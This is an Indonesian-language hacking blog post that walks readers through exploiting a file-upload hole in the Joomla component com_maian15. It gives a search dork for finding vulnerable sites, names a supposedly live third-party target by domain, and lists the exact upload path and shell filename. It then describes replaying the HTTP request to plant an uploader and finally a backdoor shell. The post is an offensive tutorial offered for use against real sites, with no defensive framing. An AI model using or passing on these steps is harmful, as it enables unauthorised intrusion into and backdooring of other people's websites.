» » » Exploit Joomla component com_maian15 upload shell Vulnerability

2:33 AM 0 ,
A+ A-
peace

okedeh cekidot:
cari target dlu..


Dork: inurl:"option=com_maian15"
silahkan dikembangkan piss

disini ane kasih 1 live target..
http://www.akindeledecker.com/C2-LyricalOverflow/

exploit:

administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php

langsung inject om,..

http://www.akindeledecker.com/C2-Lyrical...cekson.php

NB: sebenarnya ntuh file udah terupload.. dgn nama file cekson.php tapi isi filenya gak ada hammer

lanjut,. kita gunakan live http header (add on moksilla hammer)
klik replay..


langsung parkir backdoor ketawa tapi disini ane gak langsung parkir backdoor hammer , ane cuma parkir uploader hmm
uploader dari om unyil malu


klik replay

dan walaaaa... shock
uploader ane sdh tertanam kalem
direktori file:
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php

Sekarang tinggal upload "the real shell" :P

sekian tutor cupu dari ane

Maaf trit nnya berantakan :ngakak malas edit T.T

Share to:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top